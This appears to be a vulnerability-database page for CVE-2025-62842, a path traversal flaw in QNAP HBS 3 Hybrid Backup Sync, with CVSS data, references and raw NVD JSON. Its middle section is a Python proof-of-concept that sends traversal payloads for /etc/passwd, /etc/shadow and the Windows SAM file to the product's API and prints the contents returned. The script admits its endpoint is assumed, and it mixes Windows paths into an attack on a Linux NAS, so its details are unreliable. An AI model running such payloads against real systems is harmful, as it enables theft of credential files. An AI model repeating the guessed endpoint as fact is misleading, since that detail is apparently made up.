CVE-2025-62842

Description

An external control of file name or path vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read or modify files or directories. We have already fixed the vulnerability in the following version: HBS 3 Hybrid Backup Sync 26.2.0.938 and later

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:* - VULNERABLE

QNAP HBS 3 Hybrid Backup Sync < 26.2.0.938

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-62842 PoC - QNAP HBS 3 Path Traversal
Note: This is a conceptual PoC for educational purposes only.
Use responsibly and only on systems you have permission to test.
"""
import requests
import os

TARGET_IP = "<target_ip>"
HBS_PORT = 8080  # Default HBS port

def exploit_path_traversal():
    """Attempt to read arbitrary files via path traversal"""
    
    # Path traversal payloads
    payloads = [
        "../../../../etc/passwd",
        "..\\..\\..\\..\\windows\\system32\\config\\sam",
        "../../../../../../etc/shadow"
    ]
    
    # Target endpoint (assumed based on HBS 3 API structure)
    base_url = f"http://{TARGET_IP}:{HBS_PORT}/api/v1/file/read"
    
    for payload in payloads:
        try:
            params = {
                'path': payload,
                'filename': payload.split('/')[-1] if '/' in payload else payload.split('\\')[-1]
            }
            
            print(f"[*] Testing payload: {payload}")
            response = requests.get(base_url, params=params, timeout=10)
            
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[!] Potential vulnerability confirmed!")
                print(f"[+] Response length: {len(response.content)} bytes")
                print(f"[+] Sample content: {response.content[:200]}")
                return True
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    
    return False

if __name__ == "__main__":
    print("CVE-2025-62842 Path Traversal PoC")
    print("Target: QNAP HBS 3 Hybrid Backup Sync")
    exploit_path_traversal()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62842
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62842
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62842/
[4] VulDB https://vuldb.com/cve/CVE-2025-62842
[5] https://www.qnap.com/en/security-advisory/qsa-25-46

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62842", "sourceIdentifier": "[email protected]", "published": "2026-01-02T16:17:00.710", "lastModified": "2026-02-05T19:03:30.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An external control of file name or path vulnerability has been reported to affect HBS 3 Hybrid Backup Sync. If an attacker gains local network access, they can then exploit the vulnerability to read or modify files or directories.\n\nWe have already fixed the vulnerability in the following version:\nHBS 3 Hybrid Backup Sync 26.2.0.938 and later"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:hybrid_backup_sync:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2.0.938", "matchCriteriaId": "EBAF4E08-08BE-4F0C-ABA3-B0F73AB66E76"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-25-46", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}